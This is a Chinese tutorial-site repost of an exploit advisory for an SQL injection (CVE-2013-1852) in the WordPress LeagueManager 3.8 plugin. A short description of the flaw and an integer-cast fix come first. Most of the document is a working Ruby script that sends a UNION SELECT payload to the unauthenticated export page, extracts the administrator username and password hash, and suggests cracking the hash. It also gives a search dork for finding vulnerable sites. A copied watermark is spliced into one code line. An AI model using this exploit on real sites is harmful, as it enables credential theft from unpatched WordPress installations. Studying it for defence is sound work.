网站地图    收藏   

主页 > 后端 > 网站安全 >

WordPress插件LeagueManager 3.8 SQL注射 - 网站安全 - 自

来源:自学PHP网    时间:2015-04-17 11:59 作者: 阅读:

[导读] #!/usr/bin/ruby # # 标题: WordPress LeagueManager Plugin v3.8 SQL Injection # 关键词: inurl:/wp-content/plugins/leaguemanager/ # 作者r: Joshua Reynolds # 程序官网: http://word......

#!/usr/bin/ruby  
 
#  
 
# 标题: WordPress LeagueManager Plugin v3.8 SQL Injection  
 
# 关键词: inurl:"/wp-content/plugins/leaguemanager/"  
 
# 作者r: Joshua Reynolds  
 
# 程序官网: http://wordpress.org/extend/plugins/leaguemanager/  
 
#下载地址: http://downloads.wordpress.org/plugin/leaguemanager.3.8.zip  
 
# 影响版本: 3.8  
 
#测试平台: BT5R1 - Ubuntu 10.04.2 LTS  
 
# CVE: CVE-2013-1852  
 
#-----------------------------------------------------------------------------------------  
 
#概述:  
 
#  
 
#An SQL Injection vulnerability exists in the league_id parameter of a function call made  
 
#by the leaguemanager_export page. This request is processed within the leaguemanager.php:  
 
#  
 
#if ( isset($_POST['leaguemanager_export']))  
 
#               $lmLoader->adminPanel->export($_POST['league_id'], $_POST['mode']);  
 
#  
 
#Which does not sanitize of SQL injection, and is passed to the admin/admin.php page  
 
#into the export( $league_id, $mode ) function which also does not sanitize for SQL injection  
 
#when making this call: $this->league = $leaguemanager->getLeague($league_id);  
 
#The information is then echoed to a CSV file that is then provided.  
 
#  
 
#Since no authentication is required when making a POST request to this page,   
 
#i.e /wp-admin/admin.php?page=leaguemanager-export the request can be made with no established  
 
#session.  
 
#  
 
#修复方案:  
 
#  
 
#A possible fix for this would be to cast the league_id to an integer during any  
 
#of the function calls. The following changes can be made in the leaguemanager.php file:  
 
#$lmLoader->adminPanel->export((int)$_POST['league_id'], $_POST['mode']);  
 
#  
 
#These functions should also not be available to public requests, and thus session handling  
 
#should also be checked prior to the requests being processed within the admin section.  
 
#  
 
#The responsible disclosure processes were distorted by the fact that the author no longer  
 
#supports his well established plugin, and there are currently no maintainers. After  
 
#e-mailing the folks over at plugins@wordpress.org they've decided to discontinue the plugin  
 
#and not patch the vulnerability.  
 
#  
 
#The following ruby exploit will retrieve the administrator username and the salted   
 
#password hash from a given site with the plugin installed:  
 
#------------------------------------------------------------------------------------------  
 
#Exploit:  
 
   
 
require 'net/http' 
 
require 'uri' 
 
   
 
if ARGV.length == 2 
 
    post_params = {  
 
        'league_id' => '7 UNION SELECT ALL user_login,2,3,4,5,6,7,8,'\  
 
        '9,10,11,12,13,user_pass,15,16,17,18,19,20,21,22,23,24 from wp_users--',  
 
        'mode' => 'teams',  
 
        'leaguemanager_export' => 'Download+File' 
 
    }  
 
   
 
    target_url = ARGV[0] + ARGV[1] + "/wp-admin/admin.php?page=leaguemanager-export" 
 
       
 
    begin 
 
        resp = Net::HTTP.post_form(URI.parse(target_url), post_params)  
 
    rescue  www.2cto.com
 
        puts "Invalid URL..." 
 
    end 
 
           
 
    if resp.nil?  
 
        print_error "No response received..." 
 
   
 
    elsif resp.code != "200" 
 
        puts "Page doesn't exist!" 
 
    else     
 
        admin_login = resp.body.scan(/21\t(.*)\t2.*0\t(.*)\t15/)  
 
       
 
        if(admin_login.length > 0)  
 
            puts "Username: #{admin_login[0][0]}" 
 
            puts "Hash: #{admin_login[0][1]}" 
 
            puts "\nNow go crack that with Hashcat :)" 
 
        else 
 
            puts "Username and hash not received. Maybe it's patched?" 
 
        end 
 
    end 
 
else 
 
    puts "Usage: ruby LeagueManagerSQLI.rb \"http://example.com\" \"/wordpress\"" 
 
end 
 
   
 
#Shout outs: Graycon Group Security Team, Red Hat Security Team, Miss Umer, Tim Williams, Dr. Wu, friends & family.  
 
#  
 
联系方式:  
 
#Mail: infosec4breakfast@gmail.com  
 
#Blog: infosec4breakfast.com  
 
 

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论